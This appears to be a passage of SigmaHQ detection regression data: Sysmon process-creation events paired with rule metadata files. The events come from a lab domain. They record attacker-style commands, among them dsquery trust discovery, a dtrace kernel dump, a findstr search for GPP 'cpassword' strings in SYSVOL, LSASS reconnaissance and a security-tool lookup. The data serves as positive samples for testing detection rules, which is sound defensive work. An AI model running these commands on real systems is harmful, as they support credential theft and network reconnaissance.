"5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:48:36.392892Z" } }, "EventRecordID": 9075053, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:48:36.383", "ProcessGuid": "5AA13A44-D534-68FC-FF30-000000004002", "ProcessId": 168, "Image": "C:\\Windows\\System32\\dsquery.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Microsoft AD DS/LDS query command line utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "dsquery.exe", "CommandLine": "dsquery * -filter \"(objectClass=trustedDomain)\" -attr *", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=D6F0AD64BECE9028108C0C807E3C3A0EEAF4C31C,MD5=3A94027001259B03449AB5DC8B764E83,SHA256=A3720A70B407F069E21F2EF759236C2A7871A03D00B0AC7F0ACD201DA1086CB0,IMPHASH=0C732EE7E7F8F559606E6ADF3AA39CDC", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml ================================================ id: 91c77c64-7f4f-4bba-be6a-42377c97b48a description: N/A date: 2025-10-24 author: SigmaHQ Team 
rule_metadata: - id: 3bad990e-4848-4a78-9530-b427d854aac0 title: Domain Trust Discovery Via Dsquery regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-27T00:04:12.105550Z" } }, "EventRecordID": 33630917, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3380, "ThreadID": 4420 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-27 00:04:12.104", "ProcessGuid": "5AA13A44-B6FC-68FE-0802-000000004102", "ProcessId": 2524, "Image": "C:\\Program Files\\DTrace\\dtrace.exe", "FileVersion": "10.0.22621.1 (WinBuild.160101.0800)", "Description": "DTrace/NT", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "dtrace.exe", "CommandLine": "dtrace.exe -w \"syscall:::return {lkd(0); exit(0);}\"", "CurrentDirectory": "C:\\Program Files\\DTrace\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", "LogonId": "0xc47e5", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": 
"SHA1=5ECD16526AB7288C9910692B3BC73041605CD0CF,MD5=AE913F95E1F94B071DED1FFBB60EDDBD,SHA256=75C00C03BB318FCDB329D29E705C7815E14E48C801D6322984C899FAEDDBBF55,IMPHASH=DC497C8CA3DFCDF940058114BA89B413", "ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102", "ParentProcessId": 10508, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-27T00:04:13.045253Z" } }, "EventRecordID": 33630948, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3380, "ThreadID": 4420 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-27 00:04:13.044", "ProcessGuid": "5AA13A44-B6FD-68FE-0902-000000004102", "ProcessId": 7748, "Image": "C:\\Program Files\\DTrace\\dtrace.exe", "FileVersion": "10.0.22621.1 (WinBuild.160101.0800)", "Description": "DTrace/NT", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "dtrace.exe", "CommandLine": "dtrace.exe -w -n \"syscall:::return {lkd(0); exit(0);}\"", "CurrentDirectory": "C:\\Program Files\\DTrace\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", "LogonId": "0xc47e5", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": 
"SHA1=5ECD16526AB7288C9910692B3BC73041605CD0CF,MD5=AE913F95E1F94B071DED1FFBB60EDDBD,SHA256=75C00C03BB318FCDB329D29E705C7815E14E48C801D6322984C899FAEDDBBF55,IMPHASH=DC497C8CA3DFCDF940058114BA89B413", "ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102", "ParentProcessId": 10508, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml ================================================ id: c81d2cc0-3296-47fd-b57d-334b3a17ab02 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 7124aebe-4cd7-4ccb-8df0-6d6b93c96795 title: Suspicious Kernel Dump Using Dtrace regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump/7124aebe-4cd7-4ccb-8df0-6d6b93c96795.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-27T00:08:16.515256Z" } }, "EventRecordID": 33635575, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3380, "ThreadID": 4420 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" 
} } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-27 00:08:16.514", "ProcessGuid": "5AA13A44-B7F0-68FE-2902-000000004102", "ProcessId": 9040, "Image": "C:\\Windows\\explorer.exe", "FileVersion": "10.0.20348.3692 (WinBuild.160101.0800)", "Description": "Windows Explorer", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "EXPLORER.EXE", "CommandLine": "explorer shell:MyComputerFolder", "CurrentDirectory": "C:\\Program Files\\DTrace\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", "LogonId": "0xc47e5", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=8BAA602FDC6BA67545C0717E2B9063A0BFE3F278,MD5=1FB8907465FB58429762D97C1FBEA04A,SHA256=53F36699C35C8F2360608A79F0809BA888C61F15886AE2B1F209A3E9B896CBA7,IMPHASH=BECD30EE79098B21A5BA5E5CF0E18B83", "ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102", "ParentProcessId": 10508, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml ================================================ id: ddbc40a4-117f-4359-9a22-f943dd25535f description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: c3d76afc-93df-461e-8e67-9b2bad3f2ac4 title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/c3d76afc-93df-461e-8e67-9b2bad3f2ac4.evtx ================================================ FILE: 
regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:50:13.199218Z" } }, "EventRecordID": 9105822, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:50:13.191", "ProcessGuid": "5AA13A44-D595-68FC-0A31-000000004002", "ProcessId": 7772, "Image": "C:\\Windows\\System32\\findstr.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Find String (QGREP) Utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "FINDSTR.EXE", "CommandLine": "findstr /S cpassword \\\\AR-WIN-DC\\sysvol\\*.xml", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": 
"ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml ================================================ id: 1f7942f7-fd5d-40e1-ac60-df1298f49bb0 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 91a2c315-9ee6-4052-a853-6f6a8238f90d title: Findstr GPP Passwords regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/91a2c315-9ee6-4052-a853-6f6a8238f90d.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:41:46.744119Z" } }, "EventRecordID": 12151329, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:41:46.742", "ProcessGuid": "5AA13A44-0BDA-68FD-7836-000000004002", "ProcessId": 8892, "Image": "C:\\Windows\\System32\\findstr.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Find String (QGREP) Utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "FINDSTR.EXE", 
"CommandLine": "findstr lsass", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", "ParentProcessId": 3204, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/info.yml ================================================ id: 241a8371-1554-4cfc-8a51-c671669f4a71 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: fe63010f-8823-4864-a96b-a7b4a0f7b929 title: LSASS Process Reconnaissance Via Findstr.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/fe63010f-8823-4864-a96b-a7b4a0f7b929.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:47:01.671694Z" } }, 
"EventRecordID": 12249325, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:47:01.664", "ProcessGuid": "5AA13A44-0D15-68FD-B436-000000004002", "ProcessId": 2764, "Image": "C:\\Windows\\System32\\icacls.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "-", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "iCACLS.EXE", "CommandLine": "icacls \"C:\\Program Files\\*\"", "CurrentDirectory": "C:\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=0EB3DC9113AE28D77A85A52B3BF7B79A4B7FD24E,MD5=4B8207877186FAFFB90E3A4D9358CBA6,SHA256=054355C415F5686DA598011065E6FDF6BED35C5FDDA81BC5BF22B9D093CC30E2,IMPHASH=446163A548337B5BCF2727BCD1CFB399", "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ParentProcessId": 10048, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:47:01.679477Z" } }, "EventRecordID": 12249342, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { 
"#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:47:01.673", "ProcessGuid": "5AA13A44-0D15-68FD-B536-000000004002", "ProcessId": 9016, "Image": "C:\\Windows\\System32\\findstr.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Find String (QGREP) Utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "FINDSTR.EXE", "CommandLine": "findstr \"(M)\"", "CurrentDirectory": "C:\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ParentProcessId": 10048, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T17:47:01.687849Z" } }, "EventRecordID": 12249358, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 17:47:01.681", "ProcessGuid": "5AA13A44-0D15-68FD-B636-000000004002", "ProcessId": 3356, "Image": 
"C:\\Windows\\System32\\findstr.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Find String (QGREP) Utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "FINDSTR.EXE", "CommandLine": "findstr \"Everyone\"", "CurrentDirectory": "C:\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ParentProcessId": 10048, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml ================================================ id: bfab9c3b-5f4b-496c-aa6a-8870fec99738 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 47e4bab7-c626-47dc-967b-255608c9a920 title: Permission Misconfiguration Reconnaissance Via Findstr.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/47e4bab7-c626-47dc-967b-255608c9a920.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { 
"Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:51:29.178909Z" } }, "EventRecordID": 9129415, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:51:29.168", "ProcessGuid": "5AA13A44-D5E1-68FC-1131-000000004002", "ProcessId": 3384, "Image": "C:\\Windows\\System32\\cmd.exe", "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", "Description": "Windows Command Processor", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "Cmd.Exe", "CommandLine": "cmd /c \"tasklist | findstr powershell\"", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml ================================================ id: 5bb16f46-e370-4a40-a47a-d047e4482fc1 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: 
- id: ccb5742c-c248-4982-8c5c-5571b9275ad3 title: Recon Command Output Piped To Findstr.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/ccb5742c-c248-4982-8c5c-5571b9275ad3.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:52:18.663980Z" } }, "EventRecordID": 9145421, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:52:18.657", "ProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", "ProcessId": 5144, "Image": "C:\\Windows\\System32\\cmd.exe", "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", "Description": "Windows Command Processor", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "Cmd.Exe", "CommandLine": "cmd /c \"tasklist | findstr virus\"", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": 
"SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:52:18.675229Z" } }, "EventRecordID": 9145437, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:52:18.674", "ProcessGuid": "5AA13A44-D612-68FC-1A31-000000004002", "ProcessId": 6320, "Image": "C:\\Windows\\System32\\tasklist.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Lists the current running tasks", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "tasklist.exe", "CommandLine": "tasklist", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": 
"SHA1=A440302FCCCB6D181F8DB017265602397E1EB92A,MD5=2B05A9BDFAEAC5743B47A10F3F0A202B,SHA256=31E6A056EB1E722D8EC8C7E152E6A410B12D6055140BC38FFA1CCBD56AD4E623,IMPHASH=FCEA32ABE79C10DFACC88F5335DD89DE", "ParentProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", "ParentProcessId": 5144, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "cmd /c \"tasklist | findstr virus\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:52:18.677359Z" } }, "EventRecordID": 9145443, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:52:18.676", "ProcessGuid": "5AA13A44-D612-68FC-1B31-000000004002", "ProcessId": 9052, "Image": "C:\\Windows\\System32\\findstr.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Find String (QGREP) Utility", "Product": "Microsoft® Windows® 